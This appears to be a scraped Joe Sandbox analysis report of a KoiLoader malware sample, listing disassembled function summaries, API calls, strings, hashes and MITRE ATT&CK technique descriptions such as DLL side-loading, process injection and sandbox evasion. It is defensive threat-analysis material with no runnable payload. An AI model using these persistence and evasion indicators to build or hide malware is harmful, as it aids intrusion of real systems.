Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
String ID:
API String ID: 1253608127-0
Opcode ID: a431b14a7c9d3b9cad4ee7cd246c99cb4c5c9fc5cc250590508b1f79ecaf3e1f
Instruction ID: 4439ec6e769ee0e78558182c94c333d63904510408866c7bd9f7805fc0993b83
Opcode Fuzzy Hash: a431b14a7c9d3b9cad4ee7cd246c99cb4c5c9fc5cc250590508b1f79ecaf3e1f
Instruction Fuzzy Hash: FA21D671E0030AD7DF25ABB5DC70AAFB6B9BF44740F00441BE581AB384DF3999049791

Function 00155CF4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00155CEB,001558E2,00155066), ref: 00155D02
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00155D10
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00155D29
SetLastError.KERNEL32(00000000,00155CEB,001558E2,00155066), ref: 00155D7B

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 811541d6e49a746364bbd6a0b33d5659d817804edee895cd914b6647b2fe90a2
Instruction ID: af8a240a404a902544b6debeb0aab214d2f5af01fa0e27525d78ac9a1d1df769
Opcode Fuzzy Hash: 811541d6e49a746364bbd6a0b33d5659d817804edee895cd914b6647b2fe90a2
Instruction Fuzzy Hash: D101923351DA25DAA72426F47CD966B2B66EB21777730022AF9308E4F1FB9148889154

Function 00152D00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00152D8B
task.LIBCPMTD ref: 00152D97
task.LIBCPMTD ref: 00152DA3
task.LIBCPMTD ref: 00152DB2

Strings

ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy, xrefs: 00152D32

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy
API String ID: 1384045349-2373637132
Opcode ID: 825b274acca1970eb3cc1d4cb515229b66f4f5165c8bddd6b743105027427065
Instruction ID: 891e4c7ffee13020be65ae7435034890019d83d5026ba86fa223796ce173c9e6
Opcode Fuzzy Hash: 825b274acca1970eb3cc1d4cb515229b66f4f5165c8bddd6b743105027427065
Instruction Fuzzy Hash: 12216D30C0468CDEDB05DFA4C8547DEBBB4EF2A314F00825AE8217B2C1DBB55648CB95

Function 00152DE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50COMMON

Download Yara Rule

Strings

8, xrefs: 00152E0B
-, xrefs: 00152E50
=, xrefs: 00152E30

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: -$8$=
API String ID: 0-1406877022
Opcode ID: 13fafae1a219e880aaba5b9c4e80245e567fffd22efa5ec1bce551fc45b69d21
Instruction ID: 61e43586e9c980684f9eefecba5e6714f291d005fbd68453173371ee2280bc48
Opcode Fuzzy Hash: 13fafae1a219e880aaba5b9c4e80245e567fffd22efa5ec1bce551fc45b69d21
Instruction Fuzzy Hash: 84111672C0060DCACB09CFA8D8463BEB770FB56306F10825AD8227A640DB749A88DF81

Function 001583E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5D76C35C,?,?,00000000,00162094,000000FF,?,001583C5,?,?,00158399,00000016), ref: 0015841E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00158430
FreeLibrary.KERNEL32(00000000,?,00000000,00162094,000000FF,?,001583C5,?,?,00158399,00000016), ref: 00158452

Strings

mscoree.dll, xrefs: 00158417
CorExitProcess, xrefs: 00158428

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7c502123ee8cd3d5f7af86cedf69ba70e1eaa548fdc5a6d41e045f88c17a15f6
Instruction ID: db83c962b08b991272e77b167b00054731de2e188ef7475675a58eecbc50b643
Opcode Fuzzy Hash: 7c502123ee8cd3d5f7af86cedf69ba70e1eaa548fdc5a6d41e045f88c17a15f6
Instruction Fuzzy Hash: FB018631A44659EFDB129F54CC09BAEBBB8FB04B11F004625FC31A26E0DBB59A44CA90

Function 010974E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

wnsprintfW.SHLWAPI ref: 010974FF
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0109751B

Part of subcall function 01096C40: VariantInit.OLEAUT32(?), ref: 01096C57
Part of subcall function 01096C40: CoCreateInstance.OLE32(01091020,00000000,00000001,01091000,?), ref: 01096C74
Part of subcall function 01096C40: SysAllocString.OLEAUT32(\Mozilla), ref: 01096CB4
Part of subcall function 01096C40: SysFreeString.OLEAUT32(?), ref: 01096CEB
Part of subcall function 01096C40: SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 01096CF8
Part of subcall function 01096C40: SysFreeString.OLEAUT32(00000000), ref: 01096D0F

Part of subcall function 010995F0: GetFileAttributesW.KERNEL32(?,01097531), ref: 010995F1

DeleteFileW.KERNEL32(?), ref: 0109753C
ExitProcess.KERNEL32 ref: 01097544

Strings

%%ProgramData%%\r%Sr.js, xrefs: 010974F4

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: String$AllocFileFree$AttributesCreateDeleteEnvironmentExitExpandInitInstanceProcessStringsVariantwnsprintf
String ID: %%ProgramData%%\r%Sr.js
API String ID: 3376550436-2368859843
Opcode ID: 3f99b48a627c193502f90cc403b67339fe5805cb8a3719b2f64cee4f556c7c65
Instruction ID: d2233ea8802c4b7a13b1dfcdb6633481e39c0e15fce92c0fa5ff3e77cdc8dfca
Opcode Fuzzy Hash: 3f99b48a627c193502f90cc403b67339fe5805cb8a3719b2f64cee4f556c7c65
Instruction Fuzzy Hash: 6FF082B194030CA7CF20E7A0DC6DED9333CBB04714F4005A4B7D596091DAB556C58B10

Function 0015CAB0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0015CB35
__alloca_probe_16.LIBCMT ref: 0015CBFE
__freea.LIBCMT ref: 0015CC65

Part of subcall function 001593A5: HeapAlloc.KERNEL32(00000000,001511AD,?,?,001511AD,?), ref: 001593D7

__freea.LIBCMT ref: 0015CC78
__freea.LIBCMT ref: 0015CC85

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 14115dd44f8acf793bc7925a737899f446335ea5728e930adee2e208eca2db94
Instruction ID: 01b6b35f2fe1d7104701337d3e8ffb69d84d2822a6d4ce7c6636a4a8700e5daf
Opcode Fuzzy Hash: 14115dd44f8acf793bc7925a737899f446335ea5728e930adee2e208eca2db94
Instruction Fuzzy Hash: 5F51C17260030AEFEB219F648C85EBB7AA9EF54716B150129FD29DF150EB31DC58C6A0

Function 00156E12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00156DC3,00000000,?,0016BD48,?,?,?,00156F66,00000004,InitializeCriticalSectionEx,00163C98,InitializeCriticalSectionEx), ref: 00156E1F
GetLastError.KERNEL32(?,00156DC3,00000000,?,0016BD48,?,?,?,00156F66,00000004,InitializeCriticalSectionEx,00163C98,InitializeCriticalSectionEx,00000000,?,00156D1D), ref: 00156E29
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00156E51

Strings

api-ms-, xrefs: 00156E36

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 32c06511650c7ed508b47ebac72f0b0e3ebff85c45cf7afd8e8d2b033624057b
Instruction ID: 155e843c16300e39aff2551631d5d69a344afac8fcf96952214e3519c977a442
Opcode Fuzzy Hash: 32c06511650c7ed508b47ebac72f0b0e3ebff85c45cf7afd8e8d2b033624057b
Instruction Fuzzy Hash: 24E01A74680308F6EF205FA0EC07B5D3B599B20B42F504020FE2DA84E1EBA2DA5999C5

Function 0015CF7D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(5D76C35C,00000000,00000000,00000008), ref: 0015CFE0

Part of subcall function 0015A5D9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0015CC5B,?,00000000,-00000008), ref: 0015A63A

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0015D232
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0015D278
GetLastError.KERNEL32 ref: 0015D31B

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 27ac723c6228480edb496d412edda99d1ba99f322461b9efdbf6869ac27d01d9
Instruction ID: 95347240783fe5056a28e0b7c95deca6bf329335a665d9a057f618fc0c1dfb31
Opcode Fuzzy Hash: 27ac723c6228480edb496d412edda99d1ba99f322461b9efdbf6869ac27d01d9
Instruction Fuzzy Hash: 0BD16BB5D04249DFCB25CFE8D8809ADBBB5FF09311F24416AE866EB351D730A94ACB50

Function 00155DD4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00155E9B
___AdjustPointer.LIBCMT ref: 00155EBE
___AdjustPointer.LIBCMT ref: 00155F5A

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b93d03de3ef76e55000176113604154042a64010b7c4a043f906220a6f2ac0ed
Instruction ID: 9e1fd1bae2e740226eb663348c04d72bba1700328f383ffdcdbc569d7e77a3bb
Opcode Fuzzy Hash: b93d03de3ef76e55000176113604154042a64010b7c4a043f906220a6f2ac0ed
Instruction Fuzzy Hash: 2E51D672604B02EFDB298F54D862B6AF7A6EF10712F14412EEC225F5A1D731ED48C790

Function 0015E756 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000), ref: 0015E76D
GetLastError.KERNEL32(?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000,00000008,00000008,?,0015D912,00000000), ref: 0015E779

Part of subcall function 0015E73F: CloseHandle.KERNEL32(FFFFFFFE,0015E789,?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000,00000008,00000008), ref: 0015E74F

___initconout.LIBCMT ref: 0015E789

Part of subcall function 0015E701: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0015E730,0015DEFD,00000008,?,0015D36F,00000008,00000000,00000000,00000008), ref: 0015E714

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000,00000008), ref: 0015E79E

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: eb53636e7bddd570930fa788e8ac825484aff477aef5bc8941e0f23e8da5b814
Instruction ID: e6de725498b617309e3a7b8fcd382ac45da448d89a3b5a943dc460330a3e58c9
Opcode Fuzzy Hash: eb53636e7bddd570930fa788e8ac825484aff477aef5bc8941e0f23e8da5b814
Instruction Fuzzy Hash: 81F0A236515159FBCF262FD5DC4599A3F66FB083A1B144010FD2996520C772CA64DBD0

Function 001563D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 001563F5

Strings

RCC, xrefs: 0015640F
MOC, xrefs: 00156407

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 26181f7bcad69524043e8398a5b557f7d564858cff103c2bb166e01af319d70c
Instruction ID: d9842c8e21103862d8620fc7b2e66b6a55384f409323301d51178b0d918380b1
Opcode Fuzzy Hash: 26181f7bcad69524043e8398a5b557f7d564858cff103c2bb166e01af319d70c
Instruction Fuzzy Hash: FC418971900209EFCF16CF98CD81AEEBBB5BF18305F548059FD24AB221D7359994DB91

Function 00151110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 0015111B
GetModuleHandleW.KERNEL32(00000000), ref: 00151162

Strings

kernel32, xrefs: 00151116

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: kernel32
API String ID: 4139908857-541877477
Opcode ID: 6fef3f1a636cb2a89174846f66797be25057e78642904a8f61af783634853e38
Instruction ID: 6568fda02a663ac8b0021737013e9361a3ed5b047a6cfbb66965a1c0b5931def
Opcode Fuzzy Hash: 6fef3f1a636cb2a89174846f66797be25057e78642904a8f61af783634853e38
Instruction Fuzzy Hash: B021A4B9D00208EBCB04EFE4DD85AEEBBB4AF48305F108559E915AB240E7759A45CBA1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: KoiLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

